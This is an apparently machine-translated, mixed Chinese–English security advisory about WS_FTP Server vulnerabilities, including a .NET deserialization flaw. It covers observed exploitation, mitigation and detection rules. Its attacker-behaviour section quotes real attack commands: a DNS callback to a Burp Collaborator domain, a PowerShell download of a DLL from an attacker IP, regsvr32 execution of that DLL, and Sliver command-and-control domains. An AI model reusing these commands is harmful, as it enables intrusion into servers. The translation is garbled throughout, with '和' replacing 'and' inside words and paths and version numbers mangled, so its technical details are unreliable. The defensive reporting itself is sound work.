最后更新于2024年2月27日星期二17:16:38 GMT
9月27日, 2023, Progress Software published a security advisory on multiple vulnerabilities affecting WS_FTP服务器,一个安全的文件传输解决方案. 该通知中存在许多漏洞, 其中两个是关键漏洞(cve - 2023 - 40044和CVE-2023-42657). 我们的研究小组已经确定了似乎是 .NET deserialization vulnerability (cve - 2023 - 40044) 和 confirmed that it is exploitable with a single HTTPS POST request 和 a pre-existing ysoserial.网 小工具.
注意: As of September 30, Rapid7 has observed multiple instances of WS_FTP exploitation in the wild. 中详细介绍了该活动 观察到的攻击者行为 本博客的一部分.
报告中的漏洞涵盖了一系列受影响的版本, 和 several affect only WS_FTP servers that have the Ad Hoc Transfer module enabled. Nevertheless, Progress Software的建议 urges all customers to update to WS_FTP服务器.8.2,即软件的最新版本. Rapid7响应了这一建议. 供应商咨询有关于升级的指导, 以及禁用或删除Ad Hoc传输模块的信息.
关键漏洞如下-特别是NVD分数 cve - 2023 - 40044 仅作为“高”的严重程度,而不是危急的:
- cve - 2023 - 40044: 在WS_FTP服务器版本8之前.7.4和8.8.2、Ad Hoc Transfer模块存在安全漏洞 .NET deserialization vulnerability that allows an unauthenticated attacker to execute remote comm和s on the underlying WS_FTP服务器 operating system. 该漏洞影响WS_FTP服务器Ad Hoc模块的所有版本. Progress Software的建议 indicates that WS_FTP服务器 installations without the Ad Hoc Transfer module installed are not vulnerable to cve - 2023 - 40044.
- cve - 2023 - 42657: WS_FTP服务器版本在8之前.7.4和8.8.2 are vulnerable to a directory traversal vulnerability that allows an attacker to perform file operations (delete, 重命名, 删除文件夹, 在其授权的WS_FTP文件夹路径之外的文件和文件夹上. Attackers could also escape the context of the WS_FTP服务器 file structure 和 perform the same level of operations (delete, 重命名, 删除文件夹, Mkdir)在底层操作系统上的文件和文件夹位置.
下面列出了其他(非关键)漏洞. 看到 Progress Software的建议 详情请参阅:
- cve - 2023 - 40045: 在WS_FTP服务器版本8之前.7.4和8.8.2, the Ad Hoc Transfer module is vulnerable to reflected cross-site scripting (XSS). Delivery of a specialized payload could allow an attacker to execute malicious JavaScript within the context of the victim's browser.
- cve - 2023 - 40046: 在版本8之前的WS_FTP服务器管理器界面.7.4和8.8.2易受SQL注入攻击, which could allow an attacker to infer information about the structure 和 contents of the database 和 execute SQL statements that alter or delete database elements.
- cve - 2023 - 40047: 在版本8之前的WS_FTP服务器管理模块.8.2容易受到存储跨站点脚本(XSS)的攻击, which could allow an attacker with administrative privileges to import an SSL certificate with malicious attributes containing cross-site scripting payloads. 成功存储跨站点脚本负载之后, an attacker could leverage this vulnerability to target WS_FTP服务器 admins with a specialized payload which results in the execution of malicious JavaScript within the context of the victim's browser.
- cve - 2023 - 40048: WS_FTP服务器之前版本中的经理界面.8.2 was missing cross-site request forgery (CSRF) protection on a POST transaction corresponding to a WS_FTP服务器 administrative function.
- cve - 2023 - 40049: 在WS_FTP服务器版本8之前.8.2, an unauthenticated user could enumerate files under the 'WebServiceHost' directory listing.
- cve - 2022 - 27665: WS_FTP服务器.6.0容易受到XSS的反射(通过AngularJS沙盒转义表达式), which allows an attacker to execute client-side comm和s by inputting malicious payloads in the subdirectory search bar or Add folder filename boxes. 例如, t在这里 is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx / GetFileSubTree URI.
观察到的攻击者行为
在9月30日晚上, 2023, Rapid7 observed what appears to be exploitation of one or more recently disclosed WS_FTP vulnerabilities in multiple customer environments. Individual alerts our team responded to occurred within minutes of one another between 2023-10-01 01:38:43 UTC 和 01:41:38 UTC.
The process execution chain looks the same across all observed instances, indicating 可能的 大规模利用脆弱的WS_FTP服务器. 另外, 我们的耐多药团队观察到在所有事件中使用了相同的Burpsuite域, 这可能表明我们所看到的活动背后有一个单一的威胁行为者.
曾祖过程:
C:\Windows\SysWOW64\i网srv\w3wp.. exe -ap "WSFTPSVR_WTM" -v.0" -l "webengine.-a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h "C:\i网pub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.配置“-w”“-m 1 -t 20 -ta 0”
祖父母的过程:
C:\Windows\Microsoft.净\ \ v4框架.0.30319年\ csc.C:\Windows\Microsoft . exe" /noconfig /fullpaths @.净\ \ v4框架.0.30319 \临时ASP.网络文件\出去\ e514712b \ a2ab2de1 \ ryvjavth.cmdline
父进程:
C:\Windows\Microsoft.净\ \ v4框架.0.30319年\ cvtres.. exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES6C8F . exe.tmp”“c: \ Windows \微软.净\ \ v4框架.0.30319 \临时ASP.网络文件\出去\ e514712b \ a2ab2de1 \ CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP
子进程:
C:\Windows\System32\cmd./c CMD.. exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com
Rapid7托管服务还观察到以下攻击链:
曾祖过程:
C:\WINDOWS\SysWOW64\i网srv\w3wp.. exe -ap "WSFTPSVR_WTM" -v.0" -l "webengine.-a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h "C:\i网pub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.配置“-w”“-m 1 -t 20 -ta 0”
祖父母的过程:
C:\Windows\System32\cmd.“/c powershell /c”IWR http://172.245.213[.[135:3389/bcrypt -OutFile c:\用户\public\NTUSER ..dll文件
父进程:
powershell /c "IWR http://172.245.213[.[135:3389/bcrypt -OutFile c:\用户\public\NTUSER ..dll文件
子进程:
C:\Windows\System32\cmd./c regsvr32 c:\用户\public\NTUSER . exe.dll文件
在执行时, NTUSER.dll文件 联系了Cloudflare的工作人员 状态.backendapi-fe4 [.)员工(.)开发 它会掉落一个额外的文件, stage2.邮政编码,进入记忆. Stage2.邮政编码 contains another executable within that appears to be using Golang 和 communicates with the domain realtime-v1 [.] backendapi-fe4 [.)员工(.)开发. 分析 NTUSER.dll文件 确定它与silver开发后框架相关联.
缓解指导
Progress Software security advisories have borne increased scrutiny 和 garnered broader attention from media, 用户, 以及自2023年5月Cl0p勒索软件组织以来的安全社区 攻击MOVEit Transfer. Secure file transfer technologies more generally continue to be popular targets for researchers 和 attackers.
自9月30日以来,WS_FTP服务器一直处于活跃状态, 我们建议在紧急情况下更新到固定版本, 无需等待典型的补丁周期发生. 如咨询所述, "upgrading to a patched release using the full installer is the only way to remediate this issue. 当升级运行时,系统将会中断."
最理想的做法是升级到8.8.如卖方所建议. If you are using the Ad Hoc Transfer module in WS_FTP服务器 和 are not able to update to a fixed version, 请考虑禁用或移除该模块.
看到 Progress Software的建议 查阅最新资料.
Rapid7客户
InsightVM 和 Nexpose customers running WS_FTP can assess their exposure to all eight of the CVEs in this blog with authenticated vulnerability checks available in today’s (9月29日) content release.
InsightIDR 和 管理检测和响应 customers have existing detection coverage through Rapid7's expansive library of detection rules. The following detection rules are deployed 和 alerting on activity related to WS_FTP服务器 exploitation:
- 可疑进程- WS_FTP服务器进程生成CMD子进程
- Webshell - IIS生成CMD生成PowerShell
- Webshell - IIS生成PowerShell
- Webshell -由Webserver启动的命令
- 可疑进程-命令行中与Burpsuite相关的域
伶盗龙 有一个神器 以检测与IIS日志中潜在的WS_FTP利用相关的字符串.
更新
9月30日: Updated to note Rapid7 is observing multiple instances of WS_FTP exploitation in the wild 和 伶盗龙 有一个神器 available to assist in threat hunting. Proof-of-concept exploit code for cve - 2023 - 40044 is also publicly available as of the evening of Friday, 9月29日. 发现cve - 2023 - 40044的Assetnote有一篇完整的文章 在这里 截至9月30日.
10月1日: Updated with details on a second attack chain observed by Rapid7 managed services.
10月2日: Updated to specify detection rules alerting on WS_FTP服务器 exploitation for Rapid7 耐多药 和 InsightIDR customers.
